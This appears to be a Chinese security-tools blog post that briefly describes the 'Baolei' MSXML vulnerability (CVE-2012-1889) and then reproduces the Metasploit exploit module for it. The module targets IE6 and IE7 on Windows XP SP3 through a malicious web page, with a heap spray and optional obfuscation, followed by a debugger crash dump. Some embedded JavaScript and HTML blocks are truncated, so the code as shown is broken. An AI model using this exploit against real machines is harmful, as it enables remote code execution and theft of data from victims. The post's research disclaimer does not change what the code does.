暴雷漏洞(CVE-2012-1889)Metasploit利用代码

  • A+
所属分类:神兵利刃

日前,微软发布紧急公告,称Windows基础组件出现高危漏洞“暴雷”,并推出“暴雷”漏洞临时解决方案。据悉,“暴雷”是基于Windows基础组件的远程攻击漏洞,黑客可以通过该漏洞,以恶意网页、文档等形式将任意木马植入用户电脑,窃取重要资料和账号信息。

以下为Metasploit利用代码:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote 	Rank = NormalRanking 	include Msf::Exploit::Remote::HttpServer::HTML 	def initialize(info={}) 		super(update_info(info, 			'Name'           => "Microsoft XML Core Services MSXML Use-After-Free",
			'Description'    => %q{
					This module exploits a memory corruption flaw in Microsoft XML Core Services
				when trying to access a not initialized Node with the getDefinition API, which
				may corrupt memory allowing remote code execution. At the moment this module targets
				Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'sinn3r',  # Metasploit module
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2012-1889' ],
					[ 'OSVDB', '82873'],
					[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],
					[ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ]
				],
			'Payload'        =>
				{
					'BadChars' => "\x00",
					'Space'    => 1024
				},
			'DefaultOptions'  =>
				{
					'ExitFunction'         => "none",
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# msxml3.dll 8.90.1101.0
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ],
					[ 'IE 7 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jun 12 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1]  #IE 6 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2]  #IE 7 on Windows XP SP3
		else
			return nil
		end
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
			send_not_found(cli)
			return
		end

		# Set payload depending on target
		p = payload.encoded

		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

		js = <true})

		if datastore['OBFUSCATE']
			js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
			js_spray.obfuscate
		end

		object_id = rand_text_alpha(4)

		html = <


		EOS

		html = html.gsub(/^\t/, '')

		print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})

	end

end

=begin

* Crash on Windows XP SP3 - msxml3.dll 8.90.1101.0

(e34.358): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350
eip=749bd772 esp=0013e010 ebp=0013e14c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
msxml3!_dispatchImpl::InvokeHelper+0xb4:
749bd772 ff5118          call    dword ptr [ecx+18h]  ds:0023:5f5ec6a3=????????

0:008> r
eax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528
eip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
msxml3!_dispatchImpl::InvokeHelper+0xb4:
749bd772 ff5118          call    dword ptr [ecx+18h]  ds:0023:00000018=????????
0:008> k
ChildEBP RetAddr
020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4
020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e
020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa
020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50
020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa
020bf420 633a6d37 msxml3!_dispatchEx::InvokeEx+0x2d
020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98
020bf590 633a77ff jscript!VAR::InvokeByName+0x135
020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce
020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989
020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff
020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f
020bf958 633891f1 jscript!CSession::Execute+0x175
020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0
020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a
020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30
020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219

=end

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

下载地址

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: